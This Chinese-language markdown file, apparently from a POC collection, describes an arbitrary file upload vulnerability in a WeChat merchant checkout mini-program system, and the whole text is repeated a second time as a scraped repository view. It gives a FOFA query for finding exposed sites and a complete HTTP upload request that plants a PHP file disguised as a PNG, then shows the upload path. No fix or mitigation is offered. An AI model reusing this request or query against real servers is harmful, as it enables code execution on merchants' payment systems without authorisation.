POC/wpoc/微信公众号商家收银台小程序系统/微信公众号商家收银台小程序系统存在任意文件上传漏洞.md

# 微信公众号商家收银台小程序系统存在任意文件上传漏洞

# 一、漏洞简介
微信公众号商家收银台小程序系统支持创建多个店铺，各个店铺自定义不同自定义表单。通过自定义表单实现订单自定义明细通过店铺自定义表单可以轻松建立，快捷收款、微信收银台、面对面收款、商品预约预订等扫码微信支付， 提升客户服务体验，商户快速获得精准订单数据，实现账款统计。通过打开自定义的表单页面，输入自定义的指定信息，可以实现订单收款。微信公众号商家收银台小程序系统存在任意文件上传漏洞

# 二、影响版本
+ 微信公众号商家收银台小程序系统

# 三、资产测绘
+ fofa`"/index.php?s=platform/index/captcha"`
+ 特征

![1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1.png](./img/AtWHBbxuCPyxXRL2/1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1-534279.png)

# 四、漏洞复现
```java
POST /library/deep/upload.iframe.php?action=add&MaxSize=&FileType=php&savePath=&backIdName=&saveName=0 HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywb0ftWeTnkfnoTM2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close

------WebKitFormBoundarywb0ftWeTnkfnoTM2
Content-Disposition: form-data; name="uploadFileName"; filename="666.php"
Content-Type: image/png

<?php phpinfo();?>
------WebKitFormBoundarywb0ftWeTnkfnoTM2--
```

![1731658001998-f0527e68-1902-40db-929e-663a87bcc843.png](./img/AtWHBbxuCPyxXRL2/1731658001998-f0527e68-1902-40db-929e-663a87bcc843-175902.png)

```java
data/uploadfile//20241115155925921.php
```

![1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138.png](./img/AtWHBbxuCPyxXRL2/1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138-423896.png)


> 更新: 2024-11-27 10:00:07  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hbg0ot1kcqatcxhr>
first commit 2025-03-04 23:12:57 +08:00			`# 微信公众号商家收银台小程序系统存在任意文件上传漏洞`

			`# 一、漏洞简介`
			微信公众号商家收银台小程序系统支持创建多个店铺，各个店铺自定义不同自定义表单。通过自定义表单实现订单自定义明细通过店铺自定义表单可以轻松建立，快捷收款、微信收银台、面对面收款、商品预约预订等扫码微信支付，提升客户服务体验，商户快速获得精准订单数据，实现账款统计。通过打开自定义的表单页面，输入自定义的指定信息，可以实现订单收款。微信公众号商家收银台小程序系统存在任意文件上传漏洞

			`# 二、影响版本`
			`+ 微信公众号商家收银台小程序系统`

			`# 三、资产测绘`
			+ fofa`"/index.php?s=platform/index/captcha"`
			`+ 特征`

			`![1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1.png](./img/AtWHBbxuCPyxXRL2/1731657982176-e98cf239-3363-4fda-acae-1352213c1ab1-534279.png)`

			`# 四、漏洞复现`
			```java
			`POST /library/deep/upload.iframe.php?action=add&MaxSize=&FileType=php&savePath=&backIdName=&saveName=0 HTTP/1.1`
			`Host:`
			`Upgrade-Insecure-Requests: 1`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywb0ftWeTnkfnoTM2`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9`
			`Connection: close`

			`------WebKitFormBoundarywb0ftWeTnkfnoTM2`
			`Content-Disposition: form-data; name="uploadFileName"; filename="666.php"`
			`Content-Type: image/png`

			`<?php phpinfo();?>`
			`------WebKitFormBoundarywb0ftWeTnkfnoTM2--`
			```

			`![1731658001998-f0527e68-1902-40db-929e-663a87bcc843.png](./img/AtWHBbxuCPyxXRL2/1731658001998-f0527e68-1902-40db-929e-663a87bcc843-175902.png)`

			```java
			`data/uploadfile//20241115155925921.php`
			```

			`![1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138.png](./img/AtWHBbxuCPyxXRL2/1731658141195-9405c9d5-ac3c-455b-a5a9-5508648a8138-423896.png)`



			`> 更新: 2024-11-27 10:00:07`
			`> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hbg0ot1kcqatcxhr>`